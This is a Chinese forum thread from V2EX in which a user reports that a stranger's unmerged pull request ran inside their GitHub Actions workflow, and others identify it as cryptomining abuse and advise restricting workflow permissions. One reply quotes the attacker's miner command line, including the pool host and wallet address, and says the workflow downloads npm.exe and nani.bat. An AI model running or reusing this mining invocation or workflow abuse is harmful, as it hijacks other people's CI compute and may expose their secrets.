关于 github 中的 workflow 可以随便执行的问题

2021-04-12 10:33:11 +08:00
 Drinker

这两天发生的,之前申请了个 360 E5 的账号,用 github 的 workflow 跑 API 来续期,然后这两天发现有个家伙提了个 pr, 就是此人 https://github.com/laksjduetryuism,然后再 actions 里面看看到对方提的 pr 可以直接再工作流里面执行, https://imgur.com/xyv9435, pr 我还没有合并, https://imgur.com/bAV9nqm, 就直接生效了?如果这样可以执行不是就可以获取我再项目里面设置的 id 和 secret ... 害怕。。。

2614 次点击
所在节点    GitHub
29 条回复
mangoDB
2021-04-12 13:38:21 +08:00
楼主请看这个帖子。

[黑客用 GitHub 服务器挖矿,三天跑了 3 万个任务,代码惊现中文]( https://zhuanlan.zhihu.com/p/363729726 )
laoyur
2021-04-12 13:42:49 +08:00
哈哈,挖矿挖到楼主头上了,笑出声
Drinker
2021-04-12 13:48:29 +08:00
@hzcer OK,我去瞅瞅。
Drinker
2021-04-12 13:48:54 +08:00
@Trim21 那就好,谢谢。
Drinker
2021-04-12 13:49:58 +08:00
@mangoDB 就是这个....
npm.exe --algorithm argon2id_chukwa2
--pool turtlecoin.herominers.com:10380
--wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP
--password xo
yml 文件里面就是下载 npm.exe 和 nani.bat 。
Drinker
2021-04-12 13:50:58 +08:00
@laoyur 第一次遇到这种,应该就是上面说的挖矿了。
patrickyoung
2021-04-12 16:29:08 +08:00
这个 bug 已经有人在 src 交了,现在是有设置的,自己去设置里设只允许本地就行
Drinker
2021-04-12 19:19:48 +08:00
@patrickyoung 谢谢,已经给官方处理了。
raaaaaar
2021-04-13 07:40:03 +08:00
自由就是被这群人加了限制。。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/769998

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX